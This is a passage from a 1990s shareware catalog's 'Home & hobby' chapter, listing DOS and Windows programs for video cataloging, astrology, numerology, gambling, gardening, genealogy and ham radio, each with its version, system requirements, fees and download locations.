the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 5000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + + Product: VideoMaster For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.10 (03-09-95) + Needs: IBM AT (80286), Windows 3.0 or better. 330k RAM; CGA + monitor; Hercules monitor; Dual 720k floppy drives. IBM + Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + + Chapter 15, "Home & hobby" 592 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM4W.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 4969 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + To help user catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 1000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + + Product: The Wine Window [***] + Author: Prospect Software, 309-682-8151 + Version: 1.2 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 2024k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; runtime license; LAN license; site + license; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 6-month free upgrading + allowed. + Look for: availability unknown on BBSs; WWINSTAL.EXE on + CompuServe in CIS:WINSHARE forum LIBrary 19 (or contact userID + 72324,2434 for assistance). + Download size: 1419k (about 106 minutes with a 2400 baud modem) + Description: + A wine cellar management program that allows multiple cellars + or collections. Extensive graphing (ageing, value, soundness, + distributions, etc.). Multiple quality ratings. More than + 2,000 producers pre-loaded. Fast, smart collection entry. Wine + value history. Demonstation cellar included. Written by a + software professional and avid wine collector. + + + 15.5 Fortune telling & astrology + + See also: Religion & philosophy. + + Chapter 15, "Home & hobby" 593 + + + + Product: ASTRO + Author: Christopher J. Noyes Software, 718-625-2262 + Version: 2.86 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: AST286-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AS286?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for MS-DOS. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + + Product: ASTRO For Windows + Author: Christopher J. Noyes Software, 718-625-2262 + Version: 1.08 (11-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Dual 720k floppy drives; Hard disk; Mouse; XMS memory. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Plotter; Epson printer; + EMS memory; math coprocessor. + Registration fee: $44.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + + Chapter 15, "Home & hobby" 594 + + + + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ASW108-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AW108?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 1024k (about 76 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for Windows. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + + Product: By the Numbers [***] + Author: R.K. West Consulting + Version: 5.4a (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on upgrades. + Look for: NUMB54A.ZIP on BBSs; NUMBER.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10189 + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning and metaphysical + vibrations, giving a complete personality profile. Uses + Pythagorean system, takes name changes into account, analyzes + 10 personality elements, provides forecast. Readings can be + saved, edited, printed. + + + Product: clySmic Lunar Almanack + Moon's phase/place/times. See full description on page 581. + + Chapter 15, "Home & hobby" 595 + + + + Product: Crystal Ball [***] + Author: R.K. West Consulting + Version: 4.0 (05-12-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CRSTL40.ZIP on BBSs; CRYSTL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Welcome to the world of the psychic computer! This tongue-in- + cheek program makes predictions and answers questions with a + sometimes enigmatic style reminiscent of the ancient Greek + oracles. You select the subject matter for predictions of + personal interest. This could explain where those crazy tabloid + headlines come from! + + + Product: ESPTEST + Parapsychology tool. See full description on page 542. + + Product: Fortune Teller [***] + Author: R.K. West Consulting + Version: 4.4 (10-02-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on other products; discounts on + upgrades. + Look for: FORT44.ZIP on BBSs; FORTUN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10249 + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + A potpourri of fortune telling techniques includes three + playing card methods, dice, Numerology, Runes, and "Instant + Oracle". A history and explanation of each method appears in + the documentation. Also included is an ESP test. + + + Product: Geomancy [***] + Ancient system of divination with black magic. See full + description on page 661. + + Chapter 15, "Home & hobby" 596 + + + + Product: I Ching Empower Tool + Author: Empower Tools + Version: 1.0 (05-02-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $30.00 (add $6.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime CompuServe, mail support; 1-month + return policy; discounts on upgrades. Certification as Empower + Consultant with Pro version. + Look for: CHING.ZIP on BBSs; CHING.ZIP on CompuServe in + CIS:NEWBAGE forum LIBrary 2 (or contact userID 75363,1523 for + assistance). + SWREG#: 5719 + PsL#: 14045 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + New interpretation of the 5,000-year-old I Ching gives you + answers to your most important, intimate questions by bringing + your reasoning, conscious mind in contact with your intuitive + subconscious. Gives a 360-degree view of your situation and + helps you develop greater creativity and flexibility in career, + relationships, conflict resolution, strategy, Self and spirit. + Great brainstorming tool. Highly graphic. Print and/or file + your readings. Two Help files, including full text of I Ching. + + + Product: Mayan Calendar [***] + Author: R.K. West Consulting + Version: 3.8a (12-27-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: MAYAN38.ZIP on BBSs; MAYAN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent, and + then gives the Mayan astrological interpretation. Also uses + Julian period dates and will calculate from Mayan to modern + date. Has chart of Mayan and Aztec day and month names. Easy- + to-understand documentation and history of the Mayan calendar + included on disk. Norman Donaldson's excellent research is + explained in detail. + + Chapter 15, "Home & hobby" 597 + + + + Product: NUMERO UNO + Author: Christopher J. Noyes Software, 718-625-2262 + Version: 1.05 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: NUM105-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); NU105?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for numerological analysis. A fun, full-featured, + easy-to-use numerology program for MS-DOS. Does analysis of + birth date, birth name and current name. Produces interpreted + text reports, data report, and name transits and calendars. + Supports most printers and word processors. + + + Product: Personal Tarot [***] + Author: R.K. West Consulting + Version: 3.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: TAROT31.ZIP on BBSs; TAROT.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10220 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Tarot cards have been used around the world throughout history + for fun and fortune. Now you can enjoy professional quality + Tarot readings on your PC! Automates shuffling and dealing, + builds a 10-card layout, and displays card descriptions and + meanings. You choose from different methods of shuffling and + + Chapter 15, "Home & hobby" 598 + + + + layout. You can edit card interpretations and add your own + comments. Readings can be saved, edited, printed. No graphics. + + + Product: The Richard Webster System [***] + Read personalities like professional psychic. See full + description on page 636. + + Product: Wynter Stone's I Ching [***] + Author: R.K. West Consulting + Version: 1.2 (02-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: ICHNG12.ZIP on BBSs; ICHING.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10756 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + The I Ching is an ancient Chinese book used for both fortune + telling and philosophical insight. Toss coins or sticks to + create a pattern of 6 lines, forming a hexagram for + interpretation. You can edit the text for each hexagram and add + your own comments. Readings can be saved, edited, printed. + + + Product: Wynter Stone's Quick Guide [***] + Author: R.K. West Consulting + Version: 1.6 (11-17-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: WGUID16.ZIP on BBSs; WGUIDE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + If you've ever wondered what "New Age" really stands for, this + could help. It's an on-disk mini-encyclopedia of subjects + related to mystical experiences of various kinds. Both DOS and + Windows versions are included. Freeware. + + Chapter 15, "Home & hobby" 599 + + + + Product: Your ESP Test [***] + Author: R.K. West Consulting + Version: 1.5 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: ESP15.ZIP on BBSs; ESP.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Find out if you have psyhcic powers, using three standard tests + to see if you have ESP (extra-sensory perception) potential. + Try precognition (seeing the future), clairvoyance (knowing + things unseen), or telekinesis (moving objects iwth your mind). + Lots of fun! + + + 15.6 Gambling + + See also: Games, Casino games; Home & hobby, Sports, + Handicapping; Home & hobby, Sports, Betting pools. + + Product: BlackJack! + Simulation of Blackjack - great learning aid. See full + description on page 672. + + Product: Lotto Challenger + Lottery analysis for Pick 5 and 6 lotteries. See full + description on page 625. + + Product: LOTTO MANIA + Lotto Manager for lottos based on six numbers. See full + description on page 625. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 651. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 652. + + Chapter 15, "Home & hobby" 600 + + + + Product: Race The Nags + Author: Olsen Outdoors, 508-486-3985 + Version: 1.3 (08-05-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products. Registered version has no bet + limit, $500 in "seed" money and a utility for viewing + statistics on all horses. + Look for: RTNAGS13.ZIP on BBSs (call 508-875-3618 to download it + at no charge); NAGS13.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Description: + Up to 6 players. Over 200 horses! Start the game with $50 in + "seed money" and give it your best shot. Make the Hall Of Fame + if you're good enough! If you're REAL good you might make it to + the elite Millionaires Club. Place your bet to WIN PLACE or + SHOW and hope the jockey stays on your horse. + + + Product: RoboCrap.v94 + Crap table simulator. See full description on page 679. + + Product: $mart Gambler + Author: PC Information Systems, 702-342-0376 + Version: 1.6 (01-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $29.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 1-month return policy; bonus utilities. + Look for: SGAMB16.ZIP on BBSs (call 702-849-2209 to download it + at no charge); SGAMB.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 9 (or contact userID 71360,72 for assistance); + SGAMB16.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID R.SCHOENBECK for assistance). + Download size: 342k (about 26 minutes with a 2400 baud modem) + Description: + For people who play to win! Explains and gives strategies for + choosing the best casinos, money management, gambling odds and + improving luck. All the popular games are covered in full + detail with the best possible strategies for each provided. + Planning features calculate bet sizes. Reporting features + collect your data and generate reports and graphs. Shows you + + Chapter 15, "Home & hobby" 601 + + + + how to control your bankroll, analyze your play and best of all + better your results! + + + Product: Thoroughbred Handicapper Pro + Complete thoroughbred handicapping system. See full + description on page 644. + + Product: TURF.v93 + Thoroughbred handicapping system. See full description on + page 645. + + Product: ULTIMATE BACCARAT + Interactive animated Baccarat simulation. See full description + on page 680. + + Product: ULTIMATE BLACKJACK + Interactive animated blackjack simulation. See full + description on page 680. + + Product: Windows Lotto + Analysis & wheeling for Pick 5 & 6 lotteries. See full + description on page 626. + + + 15.7 Gardening + + Product: Grow'Em + Author: Paul Postuma, 506-849-6967 + Version: 3.0 (03-01-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: EMS memory. + Registration fee: $19.95 (Canadian dollars) (add $2.00 (Canadian + dollars) for shipping to U.S. addresses) (add $2.00 (Canadian + dollars) for shipping to Canadian addresses) (add $3.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; bonus data; bonus graphics; all ASP-wide offers (see + page 6); discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; GROW3V.EXE on CompuServe + in CIS:GARDENING forum LIBrary 11 (or contact userID 74471,1240 + for assistance). + SWREG#: 5335 + Download size: 868k (about 65 minutes with a 2400 baud modem) + Description: + Definitive program on propagating plants from seed, cuttings, + by layering, etc. Features over 200 species, most propagating + techniques in depth, and detailed info on growth media, + composting, cold frames, lighting, etc. Easy-to-use resource, + illustrated with sketches and digitized images, runs well under + DOS or Windows. Mouse or keyboard-driven + + Chapter 15, "Home & hobby" 602 + + + + Product: HortMan + Author: Sunrise Software, 408-377-0703 + Version: 1.0 (11-10-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $6.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; bonus + utilities; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 136k (about ten minutes with a 2400 baud modem) + Description: + A software management tool developed to bring the power of the + PC into the horticultural profession. The wise gardener keeps + an up-to-date notebook for all seasons. Retains your notes for + each plant and compile a list of task for each month of the + year. Can help organize other sources of information such as + books and periodicals. Exchange or distribute plant information + with associates and friends: it easily transfers plant + information to and from diskette. + + + 15.8 Genealogy + + Product: Brother's Keeper + Author: John Steed + Version: 5.1 (02-01-93) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $45.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, BBS, CompuServe, GEnie, + mail support; 12-month return policy; discounts on upgrades. + Lifetime free upgrading allowed. 1 free update disk(s) sent + out. + Look for: BK5*.* on BBSs (multiple files) (call 616-364-1127 to + download it at no charge); BK5*.* on CompuServe in CIS:ROOTS + forum LIBrary 3 (multiple files) (or contact userID 75745,1371 + for assistance); BK5*.* on GEnie in GENEALOGY forum LIBrary 8 + (multiple files) (or contact userID J.STEED1 for assistance). + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + A full featured genealogy program which can store names, dates, + locations, and other information for up to 1,000,000 people. It + prints all the standard charts and reports and a few unique + ones. Reports include ancestor or pedigree charts, descendant + reports with relationships, graphic descendant tree, family + group sheets, alphabetical name lists, birthday lists, custom + designed reports, ahnentafel lists, graphic box charts, and a + descendant register report. Includes gedcom. + + Chapter 15, "Home & hobby" 603 + + + + Product: CHRONOS + Interactive historical timelines. See full description on + page 536. + + Product: Cumberland Diary + Powerful diary/journal entry program. See full description on + page 179. + + Product: Cumberland Family Tree + Author: Cumberland Family Software, 615-647-4012 + Version: 3.5 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; CTRE35.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 323k (about 24 minutes with a 2400 baud modem) + Description: + Powerful, easy-to-use genealogy program with pull-down menus + and extensive on-line help. Enter birth, death, marriages, + notes. Automatically keeps track of relationships. Surname + anywhere in name. Place names entered only once then selected + from pop-up window. Print pedigrees, family groups, + descendents, time line, lists, statistics and many more + reports. + + + Product: Cumberland Story + Author: Cumberland Family Software, 615-647-4012 + Version: 1.2 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; CSTY12.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 229k (about 17 minutes with a 2400 baud modem) + Description: + Write your own or your ancestors life story. Pull-down menus, + on-line help, word processor with cut & paste features. + Suggested or user-defined chapters and topics. ASCII import and + + Chapter 15, "Home & hobby" 604 + + + + export. Multi-entry text search. Prompts help outline your + story with ideas of things to write about. + + + Product: EZ-Tree + Author: MicroFox Company, 216-659-9489 + Version: 2.30 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: EZT230.ZIP on BBSs (call 216-661-9065 to download it at + no charge); EZT230.ZIP on CompuServe in CIS:ROOTS forum LIBrary + 3 (or contact userID 73057,3113 for assistance); EZT230.ZIP on + GEnie in GENEALOGY forum LIBrary 0. + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + A genealogy program that lets you keep track your family tree. + It can link family trees together and report on them in many + different formats. Can handle 16 marriages per person and 32 + children per couple, with an almost unlimited number of people + thanks to the new linking ability. By far, this is the easiest + genealogy program to use. It presents the family in an on- + screen tree structure. + + + Product: Family Calendar for Windows + Prints family oriented, quality wall calendar. See full + description on page 150. + + Product: NOACH + Genealogy. See full description on page 308. + + Product: OMNIDay + Daily diary program for up to 10 users. See full description + on page 181. + + Chapter 15, "Home & hobby" 605 + + + + 15.8.1 Pedigrees + + Product: Kith and Kin + Author: SpanSoft, +44-(0)1383-510597 + Version: 2.03 (07-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: L-24.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: KITKIN.ZIP on BBSs; KITKIN.ZIP on CompuServe in + CIS:ROOTS forum LIBrary 2 (or contact userID 100101,1155 for + assistance). + SWREG#: 2537 + PsL#: 11172 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Stores and documents family trees which will appeal to + genealogists and family historians. Features an easy to use + graphical interface and powerful multi-level editing tools. The + program supports date and place of births, marriages and deaths + as well as mutiple marriages and aliases for each person. + Pictures, diagrams, sounds, etc may be linked to a person or + family via Windows OLE. Imports and exports PAF GEDCOM files. + Prints drop-line trees and detail reports. + + Chapter 15, "Home & hobby" 606 + + + + Product: TreeDraw + Author: SpanSoft, +44-(0)1383-510597 + Version: 1.10 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. Kith and Kin or other PAF GEDCOM comaptible + genealogy database. + Registration fee: L-20.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + graphics; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: TRD110.ZIP on BBSs (call +44-(0)1242-232623 to download + it at no charge); TREDRW.ZIP on CompuServe in CIS:ROOTS forum + LIBrary 2 (or contact userID 100101,1155 for assistance). + SWREG#: 3200 + PsL#: 11528 + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + A specialist graphics editor for creating high quality + genealogical drop-line charts. Descendant and ancestral trees + may be imported direct from Kith and Kin tree files or from PAF + GEDCOM files created by other genealogy programs. Converts + these trees into easily edited picture elements which can then + be re-formatted and re-arranged before storing and printing. It + is now easy to produce perfectly laid out charts and + incorporate pictures, diagrams and other simple graphics. + + + 15.9 Ham radio + + Product: ETCAI Electronics Instruction + Electronics learning and training system. See full description + on page 518. + + Product: LAN-LINK + Author: Software for Amateur Radio, 301-593-6136 + Version: 2.20 (07-04-93) + Needs: IBM PC, DOS 2.0 or better. Radio transceiver and TNC. + Registration fee: $45.00 + Registration benefits: Phone/CompuServe/mail support, free + upgrades. + Look for: LL220EXE.ZIP on BBSs (call 301-593-9067 to download it + at no charge); LL220.ZIP on CompuServe in CIS:HAMNET forum + LIBrary 0 (or contact userID 70531,1405 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A personal packet terminal program for the TNC1, TNC2, KPC-2 + and most of all a smart multimode digital communications + controller for the KAM, MFJ1278 and the PK-232. Menu driven, + optimizes the configuration of the TNC in each communications + + Chapter 15, "Home & hobby" 607 + + + + mode and provides smart terminal features. Includes Pactor and + ANSI color file transfers and BBS/PacketCluster smart features. + + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 407. + + Product: PC-HAM + Author: Software for Amateur Radio, 301-593-6136 + Version: 3.52 (03-20-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $36.50 + Registration benefits: Support, free updates, source code. + Look for: LOG3_52.ZIP on BBSs (call 301-593-9067 to download it + at no charge); LOG352.ZIP on CompuServe in CIS:HAMNET forum + LIBrary 0 (or contact userID 70531,1405 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + More than a simple menu driven computerized logbook, it allows + you to access the data in the logbook in ways that have not + been previously possible. For example: generate your DXCC + status automatically. A contest logging package, sweepstakes + simulation game and propagation prediction programs are also + included in the package. + + + Product: PC-TRACK + Satellite tracking package. See full description on page 581. + + Product: RADIOSIM + Simulation of a radio-electric link. See full description on + page 408. + + Product: WHATS-UP + Author: Software for Amateur Radio, 301-593-6136 + Version: 1.20 (07-01-91) + Needs: IBM PC, DOS 2.0 or better. Radio receiver and radio + modem. + Registration fee: $35.00 + Registration benefits: Phone/CompuServe/mail support, free + upgrades. + Look for: WU120EXE.ZIP on BBSs (call 301-593-9067 to download it + at no charge); WU120.ZIP on CompuServe in CIS:HAMNET forum + LIBrary 0 (or contact userID 70531,1405 for assistance). + Download size: 202k (about 15 minutes with a 2400 baud modem) + Description: + A tool which provides the Radio Amateur, or the Educator, with + the capability to perform experiments in spacecraft orbital + dynamics as well as monitoring the environment onboard several + of the Orbiting Satellites Carrying Amateur Radio (OSCAR) + during individual passes or over long periods of time. Provides + an introduction as to how this can be done using readily + available low cost equipment (under $500.00). + + Chapter 15, "Home & hobby" 608 + + + + 15.10 Health + + Product: ShotZ + Author: Unicorn Software Limited, 816-429-3558 + Version: 3.00 (01-15-92) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 6); + disks of other shareware; 